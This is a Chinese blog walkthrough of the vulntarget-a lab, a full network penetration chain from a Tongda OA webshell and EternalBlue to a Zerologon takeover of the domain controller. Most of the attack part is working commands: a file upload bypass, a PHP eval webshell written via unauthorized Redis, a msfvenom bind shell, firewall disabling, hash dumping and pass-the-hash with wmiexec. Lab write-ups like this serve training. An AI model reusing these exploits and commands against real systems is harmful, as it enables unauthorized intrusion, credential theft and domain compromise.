[vulntarget靶场] vulntarget-a

最新推荐文章于 2024-06-20 16:24:56 发布

ctostm

最新推荐文章于 2024-06-20 16:24:56 发布

阅读量675

点赞数

文章标签：网络安全 web安全安全

本文链接：https://blog.youkuaiyun.com/qq_43884092/article/details/132948400

版权

靶场地址：https://github.com/crow821/vulntarget

拓扑结构

在这里插入图片描述

信息收集

主机发现

netdiscover -r 192.168.127.0/24 -i eth0

在这里插入图片描述

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.127.130

在这里插入图片描述

访问目标80，发现为通达oa

在这里插入图片描述

WIN7漏洞利用

通达oa后台getshell

默认账号admin，空密码登录后台

在这里插入图片描述

点击系统管理 -> 系统参数设置 -> OA服务设置 找到Webroot目录

在这里插入图片描述

点击系统管理 -> 附件管理 -> 添加存储目录

在这里插入图片描述

点击组织 -> 系统管理员 -> 上传附件

在这里插入图片描述

上传txt后缀文件，根据windows系统自动去掉.的特性，利用burp抓包修改文件后缀为.php.

在这里插入图片描述

文件上传到：http://192.168.127.130/im/2309/528190762.a.php，利用哥斯拉连接

在这里插入图片描述

CVE-2017-0144(永恒之蓝)

除了80端口的通达oa，目标还开放了445端口

msfdb run
use exploit/windows/smb/ms17_010_eternalblue
set rhosts 192.168.127.130
run

在这里插入图片描述

内网渗透

查看win7网卡信息，发现存在另一个网段

在这里插入图片描述

添加路由

run post/multi/manage/autoroute

在这里插入图片描述

利用msf的post/windows/gather/arp_scanner模块收集内网存活主机

use post/windows/gather/arp_scanner
set session 1
set rhosts 10.0.20.0/24

在这里插入图片描述

利用auxiliary/server/socks_proxy模块开启socks代理

use auxiliary/server/socks_proxy
set version 4a
run

在这里插入图片描述

修改/etc/proxychains4.conf

在这里插入图片描述

利用proxychains4对内网10.0.20.99主机进行端口扫描

proxychains4 nmap -Pn -sT -p21,22,23,80-90,161,389,443,445,873,1099,1433,1521,1900,2082,2083,2222,2601,2604,3128,3306,3311,3312,3389,4440,4848,5432,5560,5900,5901,5902,6082,6379,7001-7010,7778,8080-8090,8649,8888,9000,9200,10000,11211,27017,28017,50000,50030,50060,135,139,445,53,88 10.0.20.99

在这里插入图片描述

在80端口发现phpinfo.php，得到网站根目录路径： C:/phpStudy/PHPTutorial/WWW/

在这里插入图片描述

redis未授权访问，写入webshell

proxychains4 redis-cli -h 10.0.20.99

config set dir 'C:/phpStudy/PHPTutorial/WWW/'
config set dbfilename shell.php
set 1 "<?php @eval($_POST['cmd'])?>"
save

在这里插入图片描述

proxychains4代理，利用哥斯拉连接

proxychains4 java -jar godzilla.jar

在这里插入图片描述

关闭win2016防火墙，上传msf生成的bind_shell

netsh advfirewall set allprofiles state off		#关闭防火墙

在这里插入图片描述

#msfvenom生成shell
msfvenom -p windows/x64/meterpreter/bind_tcp rhost=10.0.20.99 lport=4444 -f exe -o shell.exe

在这里插入图片描述

利用哥斯拉上传

在这里插入图片描述

执行

.\shell.exe

在这里插入图片描述

msf上线

exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set rhost 10.0.20.99
run

在这里插入图片描述

win2016上发现另一个网段

在这里插入图片描述

添加路由

run post/multi/manage/autoroute

在这里插入图片描述

发现win2016加入域，域名：vulntarget.com

在这里插入图片描述

查看域内主机

net group "Domain Computers" /domain

在这里插入图片描述

查看域控

net group "Domain Controllers" /domain

在这里插入图片描述

域控ip：10.0.10.110

ping -n 1 WIN2019

在这里插入图片描述

CVE-2020-1472上线域控

打空域控密码，exp：https://github.com/VoidSec/CVE-2020-1472

proxychains4 python3 cve-2020-1472-exploit.py 域控主机名 域控IP
proxychains4 python3 cve-2020-1472-exploit.py WIN2019 10.0.10.110

在这里插入图片描述

dump域控hash

proxychains4 impacket-secretsdump vulntarget.com/win2019\$@10.0.10.110 -no-pass

Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::

在这里插入图片描述

wmiexec上线

proxychains4 impacket-wmiexec -hashes aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15 ./administrator@10.0.10.110

net user administrator p-0p-0p-0 /domain		#修改域控密码
netsh advfirewall set allprofiles state off		#关防火墙

#开3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

在这里插入图片描述

连接3389

proxychains4 remmina

在这里插入图片描述

切换动态分辨率

在这里插入图片描述

恢复域控密码

保存注册表

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save

在这里插入图片描述

下载.save文件到本地解密

lget sam.save
lget security.save
lget system.save

在这里插入图片描述

解密

impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL

在这里插入图片描述

还原密码

proxychains4 python reinstall_original_pw.py win2019 10.0.10.110 346669a9c17532da61e8b473cb880ff0

在这里插入图片描述

再次尝试dump域控hash，发现失败，证明已经还原

proxychains4 impacket-secretsdump vulntarget.com/win2019\$@10.0.10.110 -no-pass

在这里插入图片描述